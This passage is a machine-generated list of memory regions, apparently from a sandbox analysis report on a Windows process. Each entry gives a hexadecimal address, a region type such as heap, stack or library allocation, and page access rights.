2418B000
|
heap
|
page read and write
|
||
|
AE1000
|
heap
|
page read and write
|
||
|
187457C000
|
stack
|
page read and write
|
||
|
2A4D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2357E9A0000
|
heap
|
page read and write
|
||
|
7FF886E60000
|
trusted library allocation
|
page execute and read and write
|
||
|
92F000
|
unkown
|
page read and write
|
||
|
6FF1000
|
heap
|
page read and write
|
||
|
62DF000
|
heap
|
page read and write
|
||
|
24050000
|
trusted library allocation
|
page read and write
|
||
|
2190EDF8000
|
heap
|
page read and write
|
||
|
A2F000
|
stack
|
page read and write
|
||
|
2190F2A8000
|
heap
|
page read and write
|
||
|
12C81C2D000
|
trusted library allocation
|
page read and write
|
||
|
12C80757000
|
trusted library allocation
|
page read and write
|
||
|
7230000
|
trusted library allocation
|
page read and write
|
||
|
CBB000
|
heap
|
page read and write
|
||
|
24020000
|
trusted library allocation
|
page read and write
|
||
|
24171000
|
heap
|
page read and write
|
||
|
2190D3BB000
|
heap
|
page read and write
|
||
|
7FF887000000
|
trusted library allocation
|
page read and write
|
||
|
24050000
|
trusted library allocation
|
page read and write
|
||
|
7440000
|
trusted library allocation
|
page read and write
|
||
|
12C81E2E000
|
trusted library allocation
|
page read and write
|
||
|
7FF886F90000
|
trusted library allocation
|
page execute and read and write
|
||
|
23FE0000
|
trusted library allocation
|
page read and write
|
||
|
8196000
|
heap
|
page read and write
|
||
|
23FA2000
|
trusted library allocation
|
page read and write
|
||
|
23FB1000
|
trusted library allocation
|
page read and write
|
||
|
2190EE10000
|
heap
|
page read and write
|
||
|
2190F258000
|
heap
|
page read and write
|
||
|
2190D3BB000
|
heap
|
page read and write
|
||
|
73F0000
|
trusted library allocation
|
page read and write
|
||
|
7420000
|
trusted library allocation
|
page read and write
|
||
|
21BF0000
|
trusted library allocation
|
page read and write
|
||
|
6B90000
|
direct allocation
|
page read and write
|
||
|
2190D3BD000
|
heap
|
page read and write
|
||
|
910000
|
heap
|
page read and write
|
||
|
7FF886F51000
|
trusted library allocation
|
page read and write
|
||
|
7F85000
|
trusted library allocation
|
page read and write
|
||
|
7FF886FD0000
|
trusted library allocation
|
page read and write
|
||
|
62CF000
|
heap
|
page read and write
|
||
|
7FF886FA0000
|
trusted library allocation
|
page read and write
|
||
|
21BF0000
|
trusted library allocation
|
page read and write
|
||
|
23FE0000
|
trusted library allocation
|
page read and write
|
||
|
12CF6090000
|
trusted library allocation
|
page read and write
|
||
|
12C81F30000
|
trusted library allocation
|
page read and write
|
||
|
12C80522000
|
trusted library allocation
|
page read and write
|
||
|
21BF5000
|
trusted library allocation
|
page read and write
|
||
|
7091000
|
heap
|
page read and write
|
||
|
12C8053E000
|
trusted library allocation
|
page read and write
|
||
|
2190EE11000
|
heap
|
page read and write
|
||
|
21BF0000
|
trusted library allocation
|
page read and write
|
||
|
12C80B31000
|
trusted library allocation
|
page read and write
|
||
|
2190EE42000
|
heap
|
page read and write
|
||
|
7EDD000
|
stack
|
page read and write
|
||
|
12CF637C000
|
heap
|
page read and write
|
||
|
12CF6060000
|
trusted library allocation
|
page read and write
|
||
|
8440000
|
trusted library allocation
|
page read and write
|
||
|
12CF6914000
|
heap
|
page read and write
|
||
|
2190D3A5000
|
heap
|
page read and write
|
||
|
21320000
|
direct allocation
|
page read and write
|
||
|
21D00000
|
trusted library allocation
|
page read and write
|
||
|
21A0E000
|
stack
|
page read and write
|
||
|
2190EE10000
|
heap
|
page read and write
|
||
|
7430000
|
trusted library allocation
|
page read and write
|
||
|
8411000
|
trusted library allocation
|
page read and write
|
||
|
81DE000
|
heap
|
page read and write
|
||
|
6B2B000
|
stack
|
page read and write
|
||
|
4DB5000
|
trusted library allocation
|
page read and write
|
||
|
45E4DFF000
|
stack
|
page read and write
|
||
|
8530000
|
direct allocation
|
page read and write
|
||
|
F60000
|
trusted library allocation
|
page execute and read and write
|
||
|
23FF0000
|
trusted library allocation
|
page read and write
|
||
|
2A34000
|
trusted library allocation
|
page read and write
|
||
|
12CF4665000
|
heap
|
page read and write
|
||
|
7FF887090000
|
trusted library allocation
|
page read and write
|
||
|
12CF6020000
|
trusted library allocation
|
page read and write
|
||
|
2190EDEB000
|
heap
|
page read and write
|
||
|
6AED000
|
stack
|
page read and write
|
||
|
2190D3B8000
|
heap
|
page read and write
|
||
|
21BF0000
|
trusted library allocation
|
page read and write
|
||
|
2190F24B000
|
heap
|
page read and write
|
||
|
BE0000
|
heap
|
page read and write
|
||
|
12C8203C000
|
trusted library allocation
|
page read and write
|
||
|
8480000
|
direct allocation
|
page read and write
|
||
|
2190F258000
|
heap
|
page read and write
|
||
|
F50000
|
heap
|
page readonly
|
||
|
2A67000
|
trusted library allocation
|
page execute and read and write
|
||
|
6B70000
|
direct allocation
|
page read and write
|
||
|
12CF6311000
|
heap
|
page read and write
|
||
|
2190D600000
|
heap
|
page read and write
|
||
|
24020000
|
trusted library allocation
|
page read and write
|
||
|
AB34000
|
direct allocation
|
page execute and read and write
|
||
|
2190EE07000
|
heap
|
page read and write
|
||
|
730000
|
heap
|
page read and write
|
||
|
2190F24B000
|
heap
|
page read and write
|
||
|
2357E530000
|
heap
|
page read and write
|
||
|
21310000
|
direct allocation
|
page read and write
|
||
|
23FE0000
|
trusted library allocation
|
page read and write
|
||
|
21BF0000
|
trusted library allocation
|
page read and write
|
||
|
2175E000
|
stack
|
page read and write
|
||
|
12CF46ED000
|
heap
|
page read and write
|
||
|
18744FE000
|
stack
|
page read and write
|
||
|
21A4F000
|
stack
|
page read and write
|
||
|
18748FB000
|
stack
|
page read and write
|
||
|
23F4C000
|
stack
|
page read and write
|
||
|
12C821EA000
|
trusted library allocation
|
page read and write
|
||
|
23FD0000
|
trusted library allocation
|
page read and write
|
||
|
84CE000
|
stack
|
page read and write
|
||
|
21B90000
|
heap
|
page execute and read and write
|
||
|
70F2000
|
heap
|
page read and write
|
||
|
73C0000
|
trusted library allocation
|
page read and write
|
||
|
24C0D000
|
stack
|
page read and write
|
||
|
8000000
|
heap
|
page read and write
|
||
|
2190F292000
|
heap
|
page read and write
|
||
|
AB5000
|
heap
|
page read and write
|
||
|
6910000
|
heap
|
page execute and read and write
|
||
|
12C82037000
|
trusted library allocation
|
page read and write
|
||
|
23FE6000
|
trusted library allocation
|
page read and write
|
||
|
5F0000
|
heap
|
page read and write
|
||
|
12C82202000
|
trusted library allocation
|
page read and write
|
||
|
21BF0000
|
trusted library allocation
|
page read and write
|
||
|
12C81C72000
|
trusted library allocation
|
page read and write
|
||
|
F1A000
|
trusted library allocation
|
page execute and read and write
|
||
|
2171F000
|
stack
|
page read and write
|
||
|
2190F241000
|
heap
|
page read and write
|
||
|
23FE0000
|
trusted library allocation
|
page read and write
|
||
|
23FF0000
|
trusted library allocation
|
page read and write
|
||
|
187554E000
|
stack
|
page read and write
|
||
|
46E8000
|
trusted library allocation
|
page read and write
|
||
|
24020000
|
trusted library allocation
|
page read and write
|
||
|
6B80000
|
direct allocation
|
page read and write
|
||
|
24192000
|
heap
|
page read and write
|
||
|
24610000
|
trusted library allocation
|
page read and write
|
||
|
12CF6210000
|
heap
|
page read and write
|
||
|
2A30000
|
trusted library allocation
|
page read and write
|
||
|
7E37000
|
stack
|
page read and write
|
||
|
2A62000
|
trusted library allocation
|
page read and write
|
||
|
2190F250000
|
heap
|
page read and write
|
||
|
2190D38E000
|
heap
|
page read and write
|
||
|
241B8000
|
heap
|
page read and write
|
||
|
23FE0000
|
trusted library allocation
|
page read and write
|
||
|
24000000
|
trusted library allocation
|
page read and write
|
||
|
6270000
|
heap
|
page read and write
|
||
|
9DF000
|
stack
|
page read and write
|
||
|
2190F27B000
|
heap
|
page read and write
|
||
|
24192000
|
heap
|
page read and write
|
||
|
90E000
|
stack
|
page read and write
|
||
|
12C80AD8000
|
trusted library allocation
|
page read and write
|
||
|
6FD5000
|
heap
|
page read and write
|
||
|
2179F000
|
stack
|
page read and write
|
||
|
2190D2FC000
|
heap
|
page read and write
|
||
|
739D000
|
stack
|
page read and write
|
||
|
23FE0000
|
trusted library allocation
|
page read and write
|
||
|
690E000
|
stack
|
page read and write
|
||
|
95D000
|
stack
|
page read and write
|
||
|
5E0000
|
heap
|
page read and write
|
||
|
7FF887060000
|
trusted library allocation
|
page read and write
|
||
|
12CF4620000
|
heap
|
page read and write
|
||
|
70C7000
|
trusted library allocation
|
page read and write
|
||
|
23FE0000
|
trusted library allocation
|
page read and write
|
||
|
23FBD000
|
trusted library allocation
|
page read and write
|
||
|
12C80564000
|
trusted library allocation
|
page read and write
|
||
|
2190EDF7000
|
heap
|
page read and write
|
||
|
2192E000
|
stack
|
page read and write
|
||
|
7FF8870A0000
|
trusted library allocation
|
page read and write
|
||
|
23F89000
|
stack
|
page read and write
|
||
|
12CF45F0000
|
heap
|
page read and write
|
||
|
1874779000
|
stack
|
page read and write
|
||
|
2190EE11000
|
heap
|
page read and write
|
||
|
12C821EF000
|
trusted library allocation
|
page read and write
|
||
|
23FD0000
|
trusted library allocation
|
page read and write
|
||
|
7220000
|
trusted library allocation
|
page read and write
|
||
|
2190F243000
|
heap
|
page read and write
|
||
|
2190F281000
|
heap
|
page read and write
|
||
|
23FE0000
|
trusted library allocation
|
page read and write
|
||
|
24050000
|
trusted library allocation
|
page read and write
|
||
|
72DE000
|
stack
|
page read and write
|
||
|
7FF887130000
|
trusted library allocation
|
page read and write
|
||
|
2190D3B6000
|
heap
|
page read and write
|
||
|
2357E800000
|
heap
|
page read and write
|
||
|
6D2D000
|
stack
|
page read and write
|
||
|
2190D3B5000
|
heap
|
page read and write
|
||
|
7FF887020000
|
trusted library allocation
|
page read and write
|
||
|
21C00000
|
heap
|
page read and write
|
||
|
73B0000
|
trusted library allocation
|
page read and write
|
||
|
12C80B42000
|
trusted library allocation
|
page read and write
|
||
|
24050000
|
trusted library allocation
|
page read and write
|
||
|
F20000
|
trusted library allocation
|
page read and write
|
||
|
73E0000
|
trusted library allocation
|
page read and write
|
||
|
2190D490000
|
heap
|
page read and write
|
||
|
12CF46E6000
|
heap
|
page read and write
|
||
|
2190F27B000
|
heap
|
page read and write
|
||
|
21850000
|
trusted library allocation
|
page read and write
|
||
|
8470000
|
trusted library allocation
|
page execute and read and write
|
||
|
CB0000
|
heap
|
page read and write
|
||
|
23FD0000
|
trusted library allocation
|
page read and write
|
||
|
18747F6000
|
stack
|
page read and write
|
||
|
12CF67E4000
|
heap
|
page read and write
|
||
|
12C80AF1000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DA0000
|
trusted library allocation
|
page read and write
|
||
|
A20000
|
heap
|
page read and write
|
||
|
6CEE000
|
stack
|
page read and write
|
||
|
24000000
|
trusted library allocation
|
page read and write
|
||
|
2A40000
|
trusted library allocation
|
page read and write
|
||
|
ED0000
|
trusted library section
|
page read and write
|
||
|
24172000
|
heap
|
page read and write
|
||
|
80EB000
|
stack
|
page read and write
|
||
|
1874B7B000
|
stack
|
page read and write
|
||
|
442E000
|
stack
|
page read and write
|
||
|
18745FE000
|
stack
|
page read and write
|
||
|
45E49FE000
|
stack
|
page read and write
|
||
|
24CCD000
|
stack
|
page read and write
|
||
|
2190F243000
|
heap
|
page read and write
|
||
|
7FF887120000
|
trusted library allocation
|
page read and write
|
||
|
7E60000
|
trusted library allocation
|
page read and write
|
||
|
2190EE0C000
|
heap
|
page read and write
|
||
|
12CF4707000
|
heap
|
page read and write
|
||
|
73C000
|
heap
|
page read and write
|
||
|
21BF0000
|
trusted library allocation
|
page read and write
|
||
|
2190D301000
|
heap
|
page read and write
|
||
|
212D0000
|
direct allocation
|
page read and write
|
||
|
45E4CFF000
|
stack
|
page read and write
|
||
|
18755CD000
|
stack
|
page read and write
|
||
|
2A70000
|
trusted library allocation
|
page execute and read and write
|
||
|
23FE0000
|
trusted library allocation
|
page read and write
|
||
|
2190D3AF000
|
heap
|
page read and write
|
||
|
23FE0000
|
trusted library allocation
|
page read and write
|
||
|
12CF6260000
|
heap
|
page execute and read and write
|
||
|
187447E000
|
stack
|
page read and write
|
||
|
7F90000
|
trusted library allocation
|
page read and write
|
||
|
12C8053A000
|
trusted library allocation
|
page read and write
|
||
|
850E000
|
stack
|
page read and write
|
||
|
22D41000
|
trusted library allocation
|
page read and write
|
||
|
2190F258000
|
heap
|
page read and write
|
||
|
EF0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886EC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A50000
|
trusted library allocation
|
page read and write
|
||
|
12CF610B000
|
heap
|
page read and write
|
||
|
12C81FDD000
|
trusted library allocation
|
page read and write
|
||
|
24000000
|
trusted library allocation
|
page read and write
|
||
|
7FF886F40000
|
trusted library allocation
|
page read and write
|
||
|
21B8F000
|
stack
|
page read and write
|
||
|
7FF886E5C000
|
trusted library allocation
|
page execute and read and write
|
||
|
45E52FB000
|
stack
|
page read and write
|
||
|
2357E70A000
|
heap
|
page read and write
|
||
|
2190EEE0000
|
heap
|
page read and write
|
||
|
7FF886DC0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DA3000
|
trusted library allocation
|
page execute and read and write
|
||
|
12C8154F000
|
trusted library allocation
|
page read and write
|
||
|
71F0000
|
heap
|
page execute and read and write
|
||
|
8180000
|
trusted library allocation
|
page execute and read and write
|
||
|
12CF62C5000
|
heap
|
page read and write
|
||
|
12C8220F000
|
trusted library allocation
|
page read and write
|
||
|
2357E630000
|
heap
|
page read and write
|
||
|
6BED000
|
stack
|
page read and write
|
||
|
18741FE000
|
stack
|
page read and write
|
||
|
7FF886F82000
|
trusted library allocation
|
page read and write
|
||
|
1ED000
|
stack
|
page read and write
|
||
|
F22000
|
trusted library allocation
|
page read and write
|
||
|
21B07000
|
stack
|
page read and write
|
||
|
2190D3B8000
|
heap
|
page read and write
|
||
|
12C81C00000
|
trusted library allocation
|
page read and write
|
||
|
2190D4B0000
|
heap
|
page read and write
|
||
|
12CF4600000
|
heap
|
page read and write
|
||
|
212E0000
|
direct allocation
|
page read and write
|
||
|
2190D3AC000
|
heap
|
page read and write
|
||
|
1874133000
|
stack
|
page read and write
|
||
|
2189E000
|
stack
|
page read and write
|
||
|
12CF4730000
|
heap
|
page read and write
|
||
|
6FAE000
|
stack
|
page read and write
|
||
|
2181C000
|
stack
|
page read and write
|
||
|
7FF8870C0000
|
trusted library allocation
|
page read and write
|
||
|
60DE000
|
stack
|
page read and write
|
||
|
21BF0000
|
trusted library allocation
|
page read and write
|
||
|
23F90000
|
trusted library allocation
|
page read and write
|
||
|
550000
|
heap
|
page read and write
|
||
|
7FF886DAD000
|
trusted library allocation
|
page execute and read and write
|
||
|
12CF62C8000
|
heap
|
page read and write
|
||
|
6327000
|
heap
|
page read and write
|
||
|
12CF6992000
|
heap
|
page read and write
|
||
|
7FF886DA2000
|
trusted library allocation
|
page read and write
|
||
|
217DD000
|
stack
|
page read and write
|
||
|
18741BE000
|
stack
|
page read and write
|
||
|
21CEE000
|
stack
|
page read and write
|
||
|
12CF6040000
|
trusted library allocation
|
page read and write
|
||
|
2190EE11000
|
heap
|
page read and write
|
||
|
F40000
|
trusted library allocation
|
page read and write
|
||
|
24D0E000
|
stack
|
page read and write
|
||
|
2190EE45000
|
heap
|
page read and write
|
||
|
12C81FF0000
|
trusted library allocation
|
page read and write
|
||
|
21BF0000
|
trusted library allocation
|
page read and write
|
||
|
9D414FF000
|
stack
|
page read and write
|
||
|
7FF8870D0000
|
trusted library allocation
|
page read and write
|
||
|
24050000
|
trusted library allocation
|
page read and write
|
||
|
21D10000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DFC000
|
trusted library allocation
|
page execute and read and write
|
||
|
6A5E000
|
stack
|
page read and write
|
||
|
7E70000
|
trusted library allocation
|
page read and write
|
||
|
2A60000
|
trusted library allocation
|
page read and write
|
||
|
2190D3B5000
|
heap
|
page read and write
|
||
|
7460000
|
trusted library allocation
|
page read and write
|
||
|
2190EDF3000
|
heap
|
page read and write
|
||
|
2190EDFB000
|
heap
|
page read and write
|
||
|
8520000
|
direct allocation
|
page read and write
|
||
|
21D10000
|
trusted library allocation
|
page read and write
|
||
|
12C902ED000
|
trusted library allocation
|
page read and write
|
||
|
2357E610000
|
heap
|
page read and write
|
||
|
23FF0000
|
trusted library allocation
|
page read and write
|
||
|
5DE000
|
stack
|
page read and write
|
||
|
2190F240000
|
heap
|
page read and write
|
||
|
45E4FFD000
|
stack
|
page read and write
|
||
|
2190F284000
|
heap
|
page read and write
|
||
|
62E1000
|
heap
|
page read and write
|
||
|
18756CB000
|
stack
|
page read and write
|
||
|
3CE0000
|
remote allocation
|
page execute and read and write
|
||
|
81DA000
|
heap
|
page read and write
|
||
|
9D413FF000
|
unkown
|
page read and write
|
||
|
24030000
|
trusted library allocation
|
page read and write
|
||
|
216DE000
|
stack
|
page read and write
|
||
|
2190F280000
|
heap
|
page read and write
|
||
|
24000000
|
trusted library allocation
|
page read and write
|
||
|
12CF60C0000
|
trusted library allocation
|
page read and write
|
||
|
21290000
|
direct allocation
|
page read and write
|
||
|
70C0000
|
trusted library allocation
|
page read and write
|
||
|
3E04000
|
remote allocation
|
page execute and read and write
|
||
|
7FF887070000
|
trusted library allocation
|
page read and write
|
||
|
21BF0000
|
trusted library allocation
|
page read and write
|
||
|
2190EDE0000
|
heap
|
page read and write
|
||
|
24001000
|
trusted library allocation
|
page read and write
|
||
|
23F9B000
|
trusted library allocation
|
page read and write
|
||
|
12CF6C20000
|
heap
|
page read and write
|
||
|
701C000
|
heap
|
page read and write
|
||
|
21BF0000
|
trusted library allocation
|
page read and write
|
||
|
571E000
|
trusted library allocation
|
page read and write
|
||
|
24050000
|
trusted library allocation
|
page read and write
|
||
|
6CAA000
|
stack
|
page read and write
|
||
|
12C8052E000
|
trusted library allocation
|
page read and write
|
||
|
2190D3BE000
|
heap
|
page read and write
|
||
|
6550000
|
direct allocation
|
page read and write
|
||
|
23E60000
|
heap
|
page read and write
|
||
|
7260000
|
trusted library allocation
|
page read and write
|
||
|
7EEA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
12CF634B000
|
heap
|
page read and write
|
||
|
18746FE000
|
stack
|
page read and write
|
||
|
7FF886FB0000
|
trusted library allocation
|
page read and write
|
||
|
12C80001000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DB0000
|
trusted library allocation
|
page read and write
|
||
|
7210000
|
trusted library allocation
|
page execute and read and write
|
||
|
8208000
|
heap
|
page read and write
|
||
|
12CF6085000
|
heap
|
page read and write
|
||
|
EF4000
|
trusted library allocation
|
page read and write
|
||
|
6B40000
|
direct allocation
|
page read and write
|
||
|
7E50000
|
trusted library allocation
|
page execute and read and write
|
||
|
21D20000
|
trusted library allocation
|
page read and write
|
||
|
1874AFE000
|
stack
|
page read and write
|
||
|
12C8054F000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DA4000
|
trusted library allocation
|
page read and write
|
||
|
7240000
|
trusted library allocation
|
page read and write
|
||
|
1874877000
|
stack
|
page read and write
|
||
|
2190EE07000
|
heap
|
page read and write
|
||
|
4488000
|
trusted library allocation
|
page read and write
|
||
|
24010000
|
trusted library allocation
|
page execute and read and write
|
||
|
12CF62C0000
|
heap
|
page read and write
|
||
|
611F000
|
stack
|
page read and write
|
||
|
62DA000
|
heap
|
page read and write
|
||
|
7FF8870B0000
|
trusted library allocation
|
page read and write
|
||
|
2190EDE1000
|
heap
|
page read and write
|
||
|
45E51FE000
|
stack
|
page read and write
|
||
|
8510000
|
direct allocation
|
page read and write
|
||
|
73A0000
|
trusted library allocation
|
page read and write
|
||
|
6B50000
|
direct allocation
|
page read and write
|
||
|
21BF0000
|
trusted library allocation
|
page read and write
|
||
|
23FE0000
|
trusted library allocation
|
page read and write
|
||
|
2190D38D000
|
heap
|
page read and write
|
||
|
2190D2F7000
|
heap
|
page read and write
|
||
|
A54000
|
heap
|
page read and write
|
||
|
695E000
|
stack
|
page read and write
|
||
|
AD3000
|
heap
|
page read and write
|
||
|
52C000
|
stack
|
page read and write
|
||
|
4580000
|
heap
|
page read and write
|
||
|
23FE9000
|
trusted library allocation
|
page read and write
|
||
|
735E000
|
stack
|
page read and write
|
||
|
EFD000
|
trusted library allocation
|
page execute and read and write
|
||
|
2190D3BE000
|
heap
|
page read and write
|
||
|
24170000
|
heap
|
page read and write
|
||
|
2190D3A5000
|
heap
|
page read and write
|
||
|
187467E000
|
stack
|
page read and write
|
||
|
21BF0000
|
trusted library allocation
|
page read and write
|
||
|
24050000
|
trusted library allocation
|
page read and write
|
||
|
2190D38D000
|
heap
|
page read and write
|
||
|
23FD0000
|
trusted library allocation
|
page read and write
|
||
|
12C80086000
|
trusted library allocation
|
page read and write
|
||
|
212B0000
|
direct allocation
|
page read and write
|
||
|
241A3000
|
heap
|
page read and write
|
||
|
2190F24E000
|
heap
|
page read and write
|
||
|
12CF67A0000
|
heap
|
page execute and read and write
|
||
|
23E50000
|
trusted library allocation
|
page read and write
|
||
|
629C000
|
heap
|
page read and write
|
||
|
21CF0000
|
trusted library allocation
|
page read and write
|
||
|
2190EE47000
|
heap
|
page read and write
|
||
|
23FE0000
|
trusted library allocation
|
page read and write
|
||
|
813E000
|
stack
|
page read and write
|
||
|
2190EE11000
|
heap
|
page read and write
|
||
|
74AB000
|
stack
|
page read and write
|
||
|
7F1F000
|
stack
|
page read and write
|
||
|
2190F292000
|
heap
|
page read and write
|
||
|
2190D2F6000
|
heap
|
page read and write
|
||
|
23FE0000
|
trusted library allocation
|
page read and write
|
||
|
2190F27B000
|
heap
|
page read and write
|
||
|
F00000
|
trusted library allocation
|
page read and write
|
||
|
21BF0000
|
trusted library allocation
|
page read and write
|
||
|
2446D000
|
stack
|
page read and write
|
||
|
4DCB000
|
trusted library allocation
|
page read and write
|
||
|
6240000
|
heap
|
page read and write
|
||
|
24197000
|
heap
|
page read and write
|
||
|
24050000
|
trusted library allocation
|
page read and write
|
||
|
2190F258000
|
heap
|
page read and write
|
||
|
2190EDE4000
|
heap
|
page read and write
|
||
|
62E1000
|
heap
|
page read and write
|
||
|
21D24000
|
trusted library allocation
|
page read and write
|
||
|
7FF887050000
|
trusted library allocation
|
page read and write
|
||
|
F25000
|
trusted library allocation
|
page execute and read and write
|
||
|
24071000
|
heap
|
page read and write
|
||
|
1874A7F000
|
stack
|
page read and write
|
||
|
2190D3AF000
|
heap
|
page read and write
|
||
|
2190EE44000
|
heap
|
page read and write
|
||
|
2190EE43000
|
heap
|
page read and write
|
||
|
21A80000
|
direct allocation
|
page read and write
|
||
|
2A43000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E56000
|
trusted library allocation
|
page read and write
|
||
|
2190D330000
|
heap
|
page read and write
|
||
|
2190D3BE000
|
heap
|
page read and write
|
||
|
21BF0000
|
trusted library allocation
|
page read and write
|
||
|
12C81FB4000
|
trusted library allocation
|
page read and write
|
||
|
12CF6939000
|
heap
|
page read and write
|
||
|
23FE0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E86000
|
trusted library allocation
|
page execute and read and write
|
||
|
702B000
|
heap
|
page read and write
|
||
|
2190D38D000
|
heap
|
page read and write
|
||
|
45E4AFE000
|
stack
|
page read and write
|
||
|
23FF0000
|
trusted library allocation
|
page read and write
|
||
|
634D000
|
heap
|
page read and write
|
||
|
7E40000
|
heap
|
page read and write
|
||
|
73D0000
|
trusted library allocation
|
page read and write
|
||
|
21BE0000
|
trusted library allocation
|
page read and write
|
||
|
23FE0000
|
trusted library allocation
|
page read and write
|
||
|
451E000
|
stack
|
page read and write
|
||
|
7FF887040000
|
trusted library allocation
|
page read and write
|
||
|
EE0000
|
trusted library allocation
|
page read and write
|
||
|
2190D3A8000
|
heap
|
page read and write
|
||
|
4588000
|
heap
|
page read and write
|
||
|
AB2000
|
heap
|
page read and write
|
||
|
12CF46B7000
|
heap
|
page read and write
|
||
|
23FD0000
|
trusted library allocation
|
page read and write
|
||
|
8190000
|
heap
|
page read and write
|
||
|
7410000
|
trusted library allocation
|
page read and write
|
||
|
8540000
|
direct allocation
|
page read and write
|
||
|
23E50000
|
trusted library allocation
|
page read and write
|
||
|
5F0000
|
heap
|
page read and write
|
||
|
12CF6080000
|
heap
|
page read and write
|
||
|
6560000
|
heap
|
page read and write
|
||
|
6BA0000
|
direct allocation
|
page read and write
|
||
|
2190D2C0000
|
heap
|
page read and write
|
||
|
24020000
|
trusted library allocation
|
page read and write
|
||
|
23FE0000
|
trusted library allocation
|
page read and write
|
||
|
12C90001000
|
trusted library allocation
|
page read and write
|
||
|
9734000
|
direct allocation
|
page execute and read and write
|
||
|
5C04000
|
remote allocation
|
page execute and read and write
|
||
|
23FE0000
|
trusted library allocation
|
page read and write
|
||
|
12C80AF3000
|
trusted library allocation
|
page read and write
|
||
|
EF3000
|
trusted library allocation
|
page execute and read and write
|
||
|
12C81C17000
|
trusted library allocation
|
page read and write
|
||
|
7200000
|
trusted library allocation
|
page read and write
|
||
|
446E000
|
stack
|
page read and write
|
||
|
7F30000
|
trusted library allocation
|
page execute and read and write
|
||
|
212A0000
|
direct allocation
|
page read and write
|
||
|
2A6B000
|
trusted library allocation
|
page execute and read and write
|
||
|
24050000
|
trusted library allocation
|
page read and write
|
||
|
6D40000
|
heap
|
page read and write
|
||
|
A2D000
|
heap
|
page read and write
|
||
|
12C82213000
|
trusted library allocation
|
page read and write
|
||
|
23E3D000
|
stack
|
page read and write
|
||
|
7DF47FFE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2190F27B000
|
heap
|
page read and write
|
||
|
2190F242000
|
heap
|
page read and write
|
||
|
24192000
|
heap
|
page read and write
|
||
|
12C902FC000
|
trusted library allocation
|
page read and write
|
||
|
7237000
|
trusted library allocation
|
page read and write
|
||
|
2190D3A9000
|
heap
|
page read and write
|
||
|
635C000
|
heap
|
page read and write
|
||
|
7FF886FE0000
|
trusted library allocation
|
page read and write
|
||
|
7450000
|
trusted library allocation
|
page read and write
|
||
|
21300000
|
direct allocation
|
page read and write
|
||
|
7FF886F70000
|
trusted library allocation
|
page execute and read and write
|
||
|
6B60000
|
direct allocation
|
page read and write
|
||
|
12CF6267000
|
heap
|
page execute and read and write
|
||
|
81B0000
|
heap
|
page read and write
|
||
|
21C18000
|
trusted library allocation
|
page read and write
|
||
|
8420000
|
trusted library allocation
|
page read and write
|
||
|
23FE0000
|
heap
|
page read and write
|
||
|
23FE0000
|
trusted library allocation
|
page read and write
|
||
|
21D20000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E50000
|
trusted library allocation
|
page read and write
|
||
|
55F8000
|
trusted library allocation
|
page read and write
|
||
|
6127000
|
heap
|
page read and write
|
||
|
24050000
|
trusted library allocation
|
page read and write
|
||
|
23FE0000
|
trusted library allocation
|
page read and write
|
||
|
12CF4734000
|
heap
|
page read and write
|
||
|
2A3D000
|
trusted library allocation
|
page execute and read and write
|
||
|
23FE0000
|
trusted library allocation
|
page read and write
|
||
|
6FE1000
|
heap
|
page read and write
|
||
|
12CF63C0000
|
heap
|
page execute and read and write
|
||
|
212C0000
|
direct allocation
|
page read and write
|
||
|
724A000
|
trusted library allocation
|
page read and write
|
||
|
6A1E000
|
stack
|
page read and write
|
||
|
12CF46A0000
|
heap
|
page read and write
|
||
|
12CF68E0000
|
heap
|
page read and write
|
||
|
4470000
|
heap
|
page read and write
|
||
|
23F9E000
|
trusted library allocation
|
page read and write
|
||
|
21BF0000
|
trusted library allocation
|
page read and write
|
||
|
12C80B4F000
|
trusted library allocation
|
page read and write
|
||
|
6540000
|
direct allocation
|
page read and write
|
||
|
21D27000
|
trusted library allocation
|
page read and write
|
||
|
218DF000
|
stack
|
page read and write
|
||
|
2190D324000
|
heap
|
page read and write
|
||
|
244AE000
|
stack
|
page read and write
|
||
|
219D0000
|
remote allocation
|
page read and write
|
||
|
24050000
|
trusted library allocation
|
page read and write
|
||
|
2190D3BE000
|
heap
|
page read and write
|
||
|
7FF8870E0000
|
trusted library allocation
|
page read and write
|
||
|
24020000
|
trusted library allocation
|
page read and write
|
||
|
6567000
|
heap
|
page read and write
|
||
|
2190D2A0000
|
heap
|
page read and write
|
||
|
12CF472E000
|
heap
|
page read and write
|
||
|
6C2A000
|
stack
|
page read and write
|
||
|
12C82226000
|
trusted library allocation
|
page read and write
|
||
|
2190F29E000
|
heap
|
page read and write
|
||
|
2196E000
|
stack
|
page read and write
|
||
|
12CF67C0000
|
heap
|
page read and write
|
||
|
45F3000
|
trusted library allocation
|
page read and write
|
||
|
21BF0000
|
trusted library allocation
|
page read and write
|
||
|
24187000
|
heap
|
page read and write
|
||
|
18749FE000
|
stack
|
page read and write
|
||
|
7400000
|
trusted library allocation
|
page read and write
|
||
|
55B9000
|
trusted library allocation
|
page read and write
|
||
|
12CF46AD000
|
heap
|
page read and write
|
||
|
21D00000
|
trusted library allocation
|
page read and write
|
||
|
7FF886FF0000
|
trusted library allocation
|
page read and write
|
||
|
83CE000
|
stack
|
page read and write
|
||
|
219D0000
|
remote allocation
|
page read and write
|
||
|
23E40000
|
trusted library allocation
|
page read and write
|
||
|
62B1000
|
heap
|
page read and write
|
||
|
699E000
|
stack
|
page read and write
|
||
|
12CF46F5000
|
heap
|
page read and write
|
||
|
24000000
|
trusted library allocation
|
page read and write
|
||
|
12C81C40000
|
trusted library allocation
|
page read and write
|
||
|
12CF690B000
|
heap
|
page read and write
|
||
|
2190D3B1000
|
heap
|
page read and write
|
||
|
21FEA000
|
trusted library allocation
|
page read and write
|
||
|
24C4C000
|
stack
|
page read and write
|
||
|
817E000
|
stack
|
page read and write
|
||
|
7250000
|
trusted library allocation
|
page read and write
|
||
|
212F0000
|
direct allocation
|
page read and write
|
||
|
12CF6369000
|
heap
|
page read and write
|
||
|
12CF62D2000
|
heap
|
page read and write
|
||
|
24175000
|
